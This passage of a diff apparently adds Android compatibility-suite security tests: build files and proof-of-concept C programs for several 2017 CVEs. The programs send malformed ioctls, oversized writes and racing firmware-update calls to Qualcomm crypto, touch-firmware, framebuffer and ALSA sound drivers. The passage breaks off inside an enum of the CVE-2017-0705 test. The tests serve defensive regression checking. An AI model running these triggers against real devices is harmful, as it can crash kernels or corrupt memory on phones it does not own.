+ uint32_t data_len;
+ uint8_t in_place_op;
+ uint8_t enckey[QCEDEV_MAX_KEY_SIZE];
+ uint32_t encklen;
+ uint8_t iv[QCEDEV_MAX_IV_SIZE];
+ uint32_t ivlen;
+ uint32_t byteoffset;
+ enum qcedev_cipher_alg_enum alg;
+ enum qcedev_cipher_mode_enum mode;
+ enum qcedev_oper_enum op;
+};
+
+#define QCEDEV_IOC_MAGIC 0x87
+
+#define QCEDEV_IOCTL_ENC_REQ \
+ _IOWR(QCEDEV_IOC_MAGIC, 1, struct qcedev_cipher_op_req)
+#define QCEDEV_IOCTL_DEC_REQ \
+ _IOWR(QCEDEV_IOC_MAGIC, 2, struct qcedev_cipher_op_req)
+
+void thread_func(int fd)
+{
+ struct qcedev_cipher_op_req req;
+ unsigned int i;
+ char *data;
+
+ memset(&req, 0, sizeof(struct qcedev_cipher_op_req));
+
+ data = mmap(NULL, 0xFFFFFF * 3, PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE|MAP_POPULATE, -1, 0);
+ if (data == MAP_FAILED) {
+ exit(0);
+ }
+ for (i = 0; i < 0xFFFFFF * 3; i += sizeof(void*))
+ *((unsigned long long*)(data + i)) = 0xABADACC355001337;
+
+ req.in_place_op = 1;
+ req.entries = 2;
+ req.byteoffset = 15;
+ req.mode = QCEDEV_AES_MODE_CTR;
+
+ req.op = QCEDEV_OPER_ENC;
+ req.ivlen = 1;
+ req.data_len = 0xFFFFFFFE;
+ req.vbuf.src[0].len = 4;
+ req.vbuf.src[1].len = 0xFFFFFFFE - 4;
+ req.vbuf.src[0].vaddr = (uint8_t*)data;
+ req.vbuf.src[1].vaddr = (uint8_t*)data;
+ req.vbuf.dst[0].len = 4;
+ req.vbuf.dst[1].len = 0xFFFFFFFE - 4;
+ req.vbuf.dst[0].vaddr = (uint8_t*)data;
+ req.vbuf.dst[1].vaddr = (uint8_t*)data;
+
+ ioctl(fd, QCEDEV_IOCTL_ENC_REQ, &req);
+
+ exit(0);
+}
+
+int main(void)
+{
+ int fd;
+ const char *dev = "/dev/qce";
+
+ fd = open(dev, O_RDWR);
+ if (fd < 0) {
+ return EXIT_FAILURE;
+
+ }
+ thread_func(fd);
+
+ return EXIT_FAILURE;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0577/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0577/Android.mk
new file mode 100644
index 0000000..0ef89c5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0577/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0577
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0577/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0577/poc.c
new file mode 100644
index 0000000..42455be
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0577/poc.c
@@ -0,0 +1,53 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <asm/ioctl.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <fcntl.h>
+
+int test_touch_fwu(){
+ char* dev_name = "/dev/touch_fwu";
+ int fd = open(dev_name, O_RDWR);
+
+ if (fd < 0) {
+ return -1;
+ }
+
+ size_t buf_len = 0xfffff;
+ char* buf = (char*) malloc(buf_len);
+ if (buf == NULL ) {
+ return -1;
+ }
+
+ int ret = 0;
+ ret = write(fd, buf, buf_len);
+ free(buf);
+ return ret;
+}
+
+int main()
+{
+ test_touch_fwu();
+ return 0;
+}
+
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0579/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0579/Android.mk
new file mode 100644
index 0000000..494b8c5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0579/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0579
+LOCAL_SRC_FILES := poc.c
+
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0579/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0579/poc.c
new file mode 100644
index 0000000..5bf4329
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0579/poc.c
@@ -0,0 +1,93 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <linux/fb.h>
+#include <stdlib.h>
+#include <string.h>
+
+#define MSMFB_IOCTL_MAGIC 'm'
+#define MSMFB_CURSOR _IOW(MSMFB_IOCTL_MAGIC, 130, struct fb_cursor)
+
+int call_ioctl(int file_desc, unsigned long request, void* param)
+{
+ int ret_val;
+
+ ret_val = ioctl(file_desc, request, param);
+
+ if (ret_val < 0) {
+ return ret_val;
+ }
+ return ret_val;
+}
+
+int test_mdss_msm_fb(int file_desc)
+{
+ int ret_val;
+ unsigned char* buf = malloc(0x100);
+ struct fb_cursor cursor;
+
+ memset(&cursor, 0, sizeof(struct fb_cursor ));
+
+ cursor.set = FB_CUR_SETIMAGE;
+ cursor.enable = 1;
+ cursor.rop = 0;
+ cursor.mask = 0;
+ cursor.hot.x = 0x100;
+ cursor.hot.y = 0x100;
+ cursor.image.dx = 1439;
+ cursor.image.dy = 2559;
+ cursor.image.width = 0x1000;
+ cursor.image.height = 0x1000;
+ cursor.image.fg_color = 0xff;
+ cursor.image.bg_color = 0xff00;
+ cursor.image.depth = 32;
+ cursor.image.data = malloc(cursor.image.width * cursor.image.height * 0x4 );
+
+ ret_val = call_ioctl(file_desc, MSMFB_CURSOR, &cursor );
+ if(ret_val < 0) {
+ return ret_val;
+ }
+
+ free((void *)cursor.image.data);
+ free(buf);
+
+ return ret_val;
+}
+
+int main()
+{
+ int file_desc, ret_val;
+ const char* DEVICE_FILE_NAME = "/dev/graphics/fb0";
+
+ file_desc = open(DEVICE_FILE_NAME, 0);
+ if (file_desc < 0) {
+ return -1;
+ }
+
+ test_mdss_msm_fb(file_desc);
+
+ close(file_desc);
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0580/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0580/Android.mk
new file mode 100644
index 0000000..6350b07
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0580/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0580
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0580/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0580/poc.c
new file mode 100644
index 0000000..0cf518a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0580/poc.c
@@ -0,0 +1,105 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <errno.h>
+#include <asm/ioctl.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <fcntl.h>
+
+struct firmware {
+ size_t size;
+ const uint8_t *data;
+ void **pages;
+ void *priv;
+};
+
+#define TOUCH_FWU_IOCTL_CODE (0x81)
+#define FW_UPDATE_PROCCESS _IO(TOUCH_FWU_IOCTL_CODE, 1)
+#define FW_FILE_SIZE _IOW(TOUCH_FWU_IOCTL_CODE, 2, uint32_t)
+#define FW_FILE_REQUEST _IO(TOUCH_FWU_IOCTL_CODE, 3)
+#define FW_LOAD_DONE _IO(TOUCH_FWU_IOCTL_CODE, 4)
+#define FW_UPDATE_BYPASS _IO(TOUCH_FWU_IOCTL_CODE, 5)
+
+void ioctl_modify_size_big(){
+ char* dev_name = "/dev/touch_fwu";
+ int fd = open(dev_name,O_RDWR);
+ if (fd < 0){
+ return ;
+ }
+
+ int cout = 1;
+ while(cout){
+ ioctl(fd, FW_FILE_SIZE , 0xffff );
+ ioctl(fd, FW_LOAD_DONE , 0);
+ }
+}
+
+void ioctl_modify_size_small(){
+ char* dev_name = "/dev/touch_fwu";
+ int fd = open(dev_name,O_RDWR);
+ if (fd < 0){
+ return ;
+ }
+
+ int cout = 1;
+ while(cout){
+ ioctl(fd, FW_FILE_SIZE , 0xf );
+ ioctl(fd, FW_LOAD_DONE , 0);
+ }
+}
+
+void ioctl_FW_UPDATE_PROCCESS(){
+ char* dev_name = "/dev/touch_fwu";
+ int fd = open(dev_name,O_RDWR);
+ if (fd < 0){
+ return ;
+ }
+
+ int cout = 1;
+ while(cout){
+ ioctl(fd, FW_UPDATE_PROCCESS , 0);
+ }
+}
+
+
+int main()
+{
+ pid_t pid = fork();
+ if (pid < 0) {
+ return -1;
+ }
+
+ if (0 == pid) {
+ ioctl_modify_size_big();
+ }
+ else {
+ pid_t pid1 = fork();
+ if (0 == pid1) {
+ ioctl_modify_size_small();
+ }
+ else {
+ ioctl_FW_UPDATE_PROCCESS();
+ }
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0586/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0586/Android.mk
new file mode 100644
index 0000000..393bf6c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0586/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0586
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0586/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0586/poc.c
new file mode 100644
index 0000000..6e57c93
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0586/poc.c
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+
+typedef int __bitwise snd_ctl_elem_iface_t;
+
+struct snd_ctl_elem_id {
+ unsigned int numid;
+ snd_ctl_elem_iface_t iface;
+ unsigned int device;
+ unsigned int subdevice;
+ unsigned char name[44];
+ unsigned int index;
+};
+
+struct snd_aes_iec958 {
+ unsigned char status[24];
+ unsigned char subcode[147];
+ unsigned char pad;
+ unsigned char dig_subframe[4];
+};
+
+struct snd_ctl_elem_value {
+ struct snd_ctl_elem_id id;
+ unsigned int indirect: 1;
+ union {
+ union {
+ long value[128];
+ long *value_ptr;
+ } integer;
+ union {
+ long long value[64];
+ long long *value_ptr;
+ } integer64;
+ union {
+ unsigned int item[128];
+ unsigned int *item_ptr;
+ } enumerated;
+ union {
+ unsigned char data[512];
+ unsigned char *data_ptr;
+ } bytes;
+ struct snd_aes_iec958 iec958;
+ } value;
+ struct timespec tstamp;
+ unsigned char reserved[128-sizeof(struct timespec)];
+};
+
+int main()
+{
+ int fd;
+ int ret;
+ void *map;
+ struct snd_ctl_elem_value arg;
+
+ fd = open("/dev/snd/controlC0", O_RDWR);
+ if(fd < 0){
+ return -1;
+ }
+
+ arg.id.numid = 148;
+ arg.value.enumerated.item[0] = 528;
+
+ ret = ioctl(fd,0xc4c85513,&arg);
+ if(ret < 0){
+ return -1;
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0705/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0705/Android.mk
new file mode 100644
index 0000000..bbde6e2
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0705/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0705
+LOCAL_SRC_FILES := poc.c
+LOCAL_SHARED_LIBRARIES := libnl
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0705/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0705/poc.c
new file mode 100644
index 0000000..8d48434
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0705/poc.c
@@ -0,0 +1,257 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+#include <unistd.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+
+#include <netlink/netlink.h>
+#include <netlink/genl/genl.h>
+#include <netlink/genl/ctrl.h>
+#include <net/if.h>
+#include <linux/nl80211.h>
+
+#define OUI_GOOGLE 0x001A11
+#define ANDROID_NL80211_SUBCMD_RTT_RANGE_START 0x1100
+#define F1_32 0x41414141
+#define WL_CHANSPEC_BW_80 0x2000
+
+enum wl_vendor_subcmd {
+ BRCM_VENDOR_SCMD_UNSPEC,
+ BRCM_VENDOR_SCMD_PRIV_STR,
+ GSCAN_SUBCMD_GET_CAPABILITIES = 0x1000,
+ GSCAN_SUBCMD_SET_CONFIG,
+ GSCAN_SUBCMD_SET_SCAN_CONFIG,
+ GSCAN_SUBCMD_ENABLE_GSCAN,
+ GSCAN_SUBCMD_GET_SCAN_RESULTS,
+ GSCAN_SUBCMD_SCAN_RESULTS,
+ GSCAN_SUBCMD_SET_HOTLIST,
+ GSCAN_SUBCMD_SET_SIGNIFICANT_CHANGE_CONFIG,
+ GSCAN_SUBCMD_ENABLE_FULL_SCAN_RESULTS,
+ GSCAN_SUBCMD_GET_CHANNEL_LIST,
+ ANDR_WIFI_SUBCMD_GET_FEATURE_SET,
+ ANDR_WIFI_SUBCMD_GET_FEATURE_SET_MATRIX,
+ ANDR_WIFI_RANDOM_MAC_OUI,
+ ANDR_WIFI_NODFS_CHANNELS,
+ ANDR_WIFI_SET_COUNTRY,
+ GSCAN_SUBCMD_SET_EPNO_SSID,
+ WIFI_SUBCMD_SET_SSID_WHITELIST,
+ WIFI_SUBCMD_SET_LAZY_ROAM_PARAMS,
+ WIFI_SUBCMD_ENABLE_LAZY_ROAM,
+ WIFI_SUBCMD_SET_BSSID_PREF,
+ WIFI_SUBCMD_SET_BSSID_BLACKLIST,
+ GSCAN_SUBCMD_ANQPO_CONFIG,
+ WIFI_SUBCMD_SET_RSSI_MONITOR,
+ RTT_SUBCMD_SET_CONFIG = 0x1100,
+ RTT_SUBCMD_CANCEL_CONFIG,
+ RTT_SUBCMD_GETCAPABILITY,
+ LSTATS_SUBCMD_GET_INFO = 0x1200,
+ DEBUG_START_LOGGING = 0x1400,
+ DEBUG_TRIGGER_MEM_DUMP,
+ DEBUG_GET_MEM_DUMP,
+ DEBUG_GET_VER,
+ DEBUG_GET_RING_STATUS,
+ DEBUG_GET_RING_DATA,
+ DEBUG_GET_FEATURE,
+ DEBUG_RESET_LOGGING,
+ WIFI_OFFLOAD_SUBCMD_START_MKEEP_ALIVE = 0x1600,
+ WIFI_OFFLOAD_SUBCMD_STOP_MKEEP_ALIVE,
+ /* Add more sub commands here */
+ VENDOR_SUBCMD_MAX
+};
+
+enum debug_attributes {
+ DEBUG_ATTRIBUTE_GET_DRIVER,
+ DEBUG_ATTRIBUTE_GET_FW,
+ DEBUG_ATTRIBUTE_RING_ID,
+ DEBUG_ATTRIBUTE_RING_NAME,
+ DEBUG_ATTRIBUTE_RING_FLAGS,
+ DEBUG_ATTRIBUTE_LOG_LEVEL,
+ DEBUG_ATTRIBUTE_LOG_TIME_INTVAL,
+ DEBUG_ATTRIBUTE_LOG_MIN_DATA_SIZE,
+ DEBUG_ATTRIBUTE_FW_DUMP_LEN,
+ DEBUG_ATTRIBUTE_FW_DUMP_DATA,
+ DEBUG_ATTRIBUTE_RING_DATA,
+ DEBUG_ATTRIBUTE_RING_STATUS,
+ DEBUG_ATTRIBUTE_RING_NUM
+};
+
+
+enum gscan_attributes {
+ GSCAN_ATTRIBUTE_NUM_BUCKETS = 10,
+ GSCAN_ATTRIBUTE_BASE_PERIOD,
+ GSCAN_ATTRIBUTE_BUCKETS_BAND,
+ GSCAN_ATTRIBUTE_BUCKET_ID,
+ GSCAN_ATTRIBUTE_BUCKET_PERIOD,
+ GSCAN_ATTRIBUTE_BUCKET_NUM_CHANNELS,
+ GSCAN_ATTRIBUTE_BUCKET_CHANNELS,
+ GSCAN_ATTRIBUTE_NUM_AP_PER_SCAN,
+ GSCAN_ATTRIBUTE_REPORT_THRESHOLD,
+ GSCAN_ATTRIBUTE_NUM_SCANS_TO_CACHE,
+ GSCAN_ATTRIBUTE_BAND = GSCAN_ATTRIBUTE_BUCKETS_BAND,
+ GSCAN_ATTRIBUTE_ENABLE_FEATURE = 20,
+ GSCAN_ATTRIBUTE_SCAN_RESULTS_COMPLETE,
+ GSCAN_ATTRIBUTE_FLUSH_FEATURE,
+ GSCAN_ATTRIBUTE_ENABLE_FULL_SCAN_RESULTS,
+ GSCAN_ATTRIBUTE_REPORT_EVENTS,
+ /* remaining reserved for additional attributes */
+ GSCAN_ATTRIBUTE_NUM_OF_RESULTS = 30,
+ GSCAN_ATTRIBUTE_FLUSH_RESULTS,
+ GSCAN_ATTRIBUTE_SCAN_RESULTS, /* flat array of wifi_scan_result */
+ GSCAN_ATTRIBUTE_SCAN_ID, /* indicates scan number */
+ GSCAN_ATTRIBUTE_SCAN_FLAGS, /* indicates if scan was aborted */
+ GSCAN_ATTRIBUTE_AP_FLAGS, /* flags on significant change event */
+ GSCAN_ATTRIBUTE_NUM_CHANNELS,
+ GSCAN_ATTRIBUTE_CHANNEL_LIST,
+ /* remaining reserved for additional attributes */
+ GSCAN_ATTRIBUTE_SSID = 40,
+ GSCAN_ATTRIBUTE_BSSID,
+ GSCAN_ATTRIBUTE_CHANNEL,
+ GSCAN_ATTRIBUTE_RSSI,
+ GSCAN_ATTRIBUTE_TIMESTAMP,
+ GSCAN_ATTRIBUTE_RTT,
+ GSCAN_ATTRIBUTE_RTTSD,
+ /* remaining reserved for additional attributes */
+ GSCAN_ATTRIBUTE_HOTLIST_BSSIDS = 50,
+ GSCAN_ATTRIBUTE_RSSI_LOW,
+ GSCAN_ATTRIBUTE_RSSI_HIGH,
+ GSCAN_ATTRIBUTE_HOSTLIST_BSSID_ELEM,
+ GSCAN_ATTRIBUTE_HOTLIST_FLUSH,
+ /* remaining reserved for additional attributes */
+ GSCAN_ATTRIBUTE_RSSI_SAMPLE_SIZE = 60,
+ GSCAN_ATTRIBUTE_LOST_AP_SAMPLE_SIZE,
+ GSCAN_ATTRIBUTE_MIN_BREACHING,
+ GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_BSSIDS,
+ GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_FLUSH,
+ /* EPNO */
+ GSCAN_ATTRIBUTE_EPNO_SSID_LIST = 70,
+ GSCAN_ATTRIBUTE_EPNO_SSID,
+ GSCAN_ATTRIBUTE_EPNO_SSID_LEN,
+ GSCAN_ATTRIBUTE_EPNO_RSSI,
+ GSCAN_ATTRIBUTE_EPNO_FLAGS,
+ GSCAN_ATTRIBUTE_EPNO_AUTH,
+ GSCAN_ATTRIBUTE_EPNO_SSID_NUM,
+ GSCAN_ATTRIBUTE_EPNO_FLUSH,
+ /* Roam SSID Whitelist and BSSID pref */
+ GSCAN_ATTRIBUTE_WHITELIST_SSID = 80,
+ GSCAN_ATTRIBUTE_NUM_WL_SSID,
+ GSCAN_ATTRIBUTE_WL_SSID_LEN,
+ GSCAN_ATTRIBUTE_WL_SSID_FLUSH,
+ GSCAN_ATTRIBUTE_WHITELIST_SSID_ELEM,
+ GSCAN_ATTRIBUTE_NUM_BSSID,
+ GSCAN_ATTRIBUTE_BSSID_PREF_LIST,
+ GSCAN_ATTRIBUTE_BSSID_PREF_FLUSH,
+ GSCAN_ATTRIBUTE_BSSID_PREF,
+ GSCAN_ATTRIBUTE_RSSI_MODIFIER,
+ /* Roam cfg */
+ GSCAN_ATTRIBUTE_A_BAND_BOOST_THRESHOLD = 90,
+ GSCAN_ATTRIBUTE_A_BAND_PENALTY_THRESHOLD,
+ GSCAN_ATTRIBUTE_A_BAND_BOOST_FACTOR,
+ GSCAN_ATTRIBUTE_A_BAND_PENALTY_FACTOR,
+ GSCAN_ATTRIBUTE_A_BAND_MAX_BOOST,
+ GSCAN_ATTRIBUTE_LAZY_ROAM_HYSTERESIS,
+ GSCAN_ATTRIBUTE_ALERT_ROAM_RSSI_TRIGGER,
+ GSCAN_ATTRIBUTE_LAZY_ROAM_ENABLE,
+ /* BSSID blacklist */
